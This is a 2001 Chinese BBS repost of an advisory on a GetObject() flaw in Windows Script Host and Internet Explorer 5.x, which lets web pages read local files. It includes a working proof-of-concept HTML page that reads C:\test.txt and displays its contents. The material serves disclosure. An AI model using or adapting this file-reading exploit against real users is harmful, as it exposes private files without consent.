荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: jjksam (Linux,c/c++,java), 信区: Security
标 题: [转载] MS Windows Script Host GetObject()安全漏洞(转寄)
发信站: 荔园晨风BBS站 (Tue Nov 27 08:51:04 2001), 转信
【 以下文字转载自 jjksam 的信箱 】
【 原文由 jjksam@smth.org 所发表 】
发信人: Quaful (夸父·逐日), 信区: Security
标 题: MS Windows Script Host GetObject()安全漏洞
发信站: BBS 水木清华站 (Mon Nov 26 19:48:45 2001)
Microsoft的Windows Script Host(Windows 98/ME/2000/XP自带)存在一个
安全漏洞,可以让Web站点读取访问者的硬盘上的文档。示例代码:
test.html文件,可以读取C:\Test.txt文件:
<HTML>
<HEAD>
<TITLE>
IE 5.5 security vulnerability - GetObject() exposes user's files -
Georgi Gunins
ki Security Research
</TITLE>
</HEAD>
<BODY>
IE 5.5 security vulnerability - GetObject() exposes user's files.
<BR>
Written by Georgi Guninski
<SCRIPT>
alert("This script reads C:\\TEST.TXT\nYou may need to create it");
a=GetObject("c:\\test.txt","htmlfile");
setTimeout("alert(a.body.innerText);",2000);
</SCRIPT>
<BR>
<center>(C) Copyright 2000 Georgi Guninski</center>
<BR>
<center>
</BODY>
</HTML>
受影响的系统:所有的IE 5.x版本,包括IE 5.5 SP1/SP2
--
* _____ o
* _______ │ │ o
* ____==== ]OO|_n_n__][. |WU~~~ 火车来啦! |
* [________]_|__|________)< |HONGLONGHONGLONG|
* oo oo 'oo OOOO-| oo\\_ ~~~|~~~
* +--+--+--+--+--+--+--+--+-$1-+--+--+--+--+
※ 来源:·BBS 水木清华站 smth.org·[FROM: 166.111.168.99]
--
※ 转载:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.0.146]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店